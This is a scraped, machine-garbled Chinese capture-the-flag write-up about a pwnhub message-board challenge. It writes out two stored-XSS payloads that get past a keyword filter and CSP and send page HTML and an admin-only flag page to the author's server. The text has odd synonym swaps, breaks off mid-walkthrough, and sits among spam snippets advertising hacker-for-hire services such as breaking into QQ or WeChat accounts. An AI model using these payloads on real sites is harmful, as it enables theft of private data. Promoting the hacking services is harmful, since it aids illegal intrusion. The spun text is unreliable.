pwnhub -- 肯定防护 writeup
周末做了一道关于我来说很蛋疼的标题...可是看了各位师傅的writeup就觉得自己的思路太窄了....
标题地址:https://pwnhub.cn/gamedetail?id=13
注册之后有个留言板,有CSP(不允许对外发送恳求),通过测验只过滤一次某些单次,如:on,oonn就能过。
用表单来绕过csp回来页面到我的服务器上,看到提示
poc:
<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')">
转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...):
拜访http://52.80.63.91/adminshigesha233e3333/ 提示flag.php
拜访flag.php 提示只要admin能看....
测验盲打admin回来flag.php的内容.
poc:
<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')})">
提示:nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...
http://52.80.63.91/adminshigesha233e3333/
PS:在这里卡了一天多,在各种测验加header拜访,get拜访,post拜访,各种蛋疼,测到深夜的时分标题后端挂了...
检查源码:
[1] [2] 黑客接单网
相关文章
局域网qq监控软件-网上接单
3.1 东南亚区域模块(module)日志// Based on blink::mojom::AppCacheBackend interface事实上,一些歹意安排或许现在正在做这样的工作。 有一些歹...
Chrome歹意插件怎么侵略用户计算机
在咱们日常的日子中,浏览器扮演了一个更加重要的人物。跟着WEB使用的开展,咱们开端把最私密的数据放到如Facebook、Amazon或许Gmail等在线服务平台上。 这样的大趋势使得咱们的在线服务更...
黑客接单后说一天等于多少时间,怎样和黑客联系,怎么找黑客帮忙找回qq
然后点击右下角的OK,然后在所有回到的界面中持续点击右下角的OK 首要问题总结一下便是越权,在思科VPN的登录进口设置处能够设置一些title以及logo等。 可是这些当地是能够被越权修正掉的,...
鲸鱼黑客工作室接单_如何找黑客帮忙找人
2017年11月中旬,Managed Defense承认并呼应了针对工程职业客户的要挟活动。 进犯者运用盗取的凭证和揭露可用的东西——SensePost的RULER来装备客户端邮件规矩,旨在从自己操控...
黑客接单平台_强制看非好友的朋友圈
SelectCacheForSharedWorker select_cache_for_shared_worker = 5;黑客接单渠道模块日志事实上,一些歹意安排或许现在正在做这样的工作。 有一些歹...
电脑杀毒软件哪个好用_哪儿有黑客高手的联系方式-怎样找黑客高手
「电脑杀毒软件哪个好用_哪儿有黑客高手的联系方式-怎样找黑客高手」该缝隙初次露脸是在名为“沙虫”的俄罗斯黑客安排进犯运用的时分呈现的。 进犯方针包含北约、乌克兰ZF安排、西欧ZF安排、能源行业企业(特...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!